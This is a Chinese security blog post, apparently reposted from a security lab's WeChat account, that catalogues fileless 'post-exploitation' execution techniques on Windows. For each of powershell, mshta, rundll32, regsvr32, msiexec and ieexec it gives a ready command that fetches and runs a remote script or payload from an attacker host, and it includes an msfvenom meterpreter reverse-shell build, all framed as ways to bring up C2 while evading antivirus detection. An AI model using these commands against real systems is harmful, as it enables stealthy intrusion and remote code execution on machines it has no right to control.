后渗透之windows中无文件落地执行方法

admin 2023年5月19日18:38:14评论167 views字数 2003阅读6分40秒阅读模式

后渗透之windows中无文件落地执行方法
{
点击蓝色

 

关注我们
}

后渗透之windows中无文件落地执行方法


前言

在我们渗透过程中,当getshell或者能够执行命令后需要上线C2时,一般是执行下载(或上传)将文件写入目标服务器后执行。这种方式会留下一个二进制文件可能会被扫描查杀。

而通过一些系统或组件自带命令进行文件不落地执行,这种方式不会留下二进制文件,更具有隐蔽性。本文将列举一些文件不落地的命令方法。


powershell

在win7/2008开始引入的一种跨平台的任务自动化解决方案,由命令行 shell、
脚本语言和配置管理框架组成。
powershell功能十分强大。一行命令即可直接执行远程文件。
文件路径:

  • C:WindowsSystem32WindowsPowerShellv1.0powershell.exe

支持系统: >= win7/win2008

用法:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx/test.ps1'))"

后渗透之windows中无文件落地执行方法


mshta

mshta.exe是Windows操作系统内置程序,用于执行.hta文件(HTML应用程序)

文件路径:

  • C:WindowsSystem32mshta.exe

支持系统: win7-win11

用法:

vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) mshta http://webserver/payload.hta /cmd /c mshta.exe javascript:a(GetObject("script:http://1.1.1.1/m.sct")).Exec();close();

后渗透之windows中无文件落地执行方法


rundll32

Rundll32.exe是win系统非常重要的核心程序。它的作用是执行DLL文件,在命令行下调用动态链接程序库。
系统中还有一个Rundll64.exe文件,它的意思是"执行64位的DLL文件",这两个是病毒软件制作者的最爱,也是在以往病毒分析报告中出现最多的应用媒介

文件路径:

  • C:WindowsSystem32rundll32.exe

支持系统: win7 -win11

用法:

远程加载:C:WindowsSysWOW64rundll32.exe javascript:"..mshtml,RunHTMLApplication";document.write();GetObject("script:http://192.168.1.4/Rundll32_shellcode"

执行远程文件

后渗透之windows中无文件落地执行方法

后渗透之windows中无文件落地执行方法


Regsvr32

Regsvr32是用于注册COM组件,Windows 命令行下提供的注册控件或者卸载控件的命令

文件路径:

  • C:WindowsSystem32Regsvr32.exe

支持系统: win7 -win11

用法:

regsvr32 /u /n /s /i:http://192.168.173.45:8800/file.sct scrobj.dll

后渗透之windows中无文件落地执行方法

后渗透之windows中无文件落地执行方法


Msiexec.exe

win核心应用,用于安装msi包。是Windows Installer的一部分。

文件路径:

  • C:WindowsSystem32msiexec.exe

支持系统: win7 -win11

用法:

msiexec.exe /q /i http://192.168.173.45/test.msi
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.14.1 -f msi > test.msi msiexec.exe /q /i http://192.168.173.45/test.msi

后渗透之windows中无文件落地执行方法


IEexec

IEexec.exe是.NET Framework附带程序,.NET框架在win系统自带。
而同目录下的Csc.exe就是C#的语言编译器
文件路径:

  • C:WindowsMicrosoft.NETFrameworkv2.0.50727ieexec.exe

支持系统: win7 -win11

用法:

cd C:WindowsMicrosoft.NETFramework64v2.0.50727 caspol -s off ieexec http://ip:8080/test.exe


总结

这里只列举了一些常用不落地执行方法,当然还有很多方法比如利用特定版本中组件的方法。使用这些方法需要满足出网条件,实战中还是需要开阔思路,找到现有场景中的缺陷才能bypass


往期回顾

01

网络空间搜索引擎使用技巧

02


两个账户劫持案例



03


后渗透之windows中远程下载文件tips


后渗透之windows中无文件落地执行方法

雷石安全实验室

商务咨询:

0571-87031601

商务邮箱:

[email protected]


后渗透之windows中无文件落地执行方法
觉得文章不错,记得【点赞、在看、转发】!!!

原文始发于微信公众号(雷石安全实验室):后渗透之windows中无文件落地执行方法

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月19日18:38:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   后渗透之windows中无文件落地执行方法http://cn-sec.com/archives/1747373.html

发表评论

匿名网友 填写信息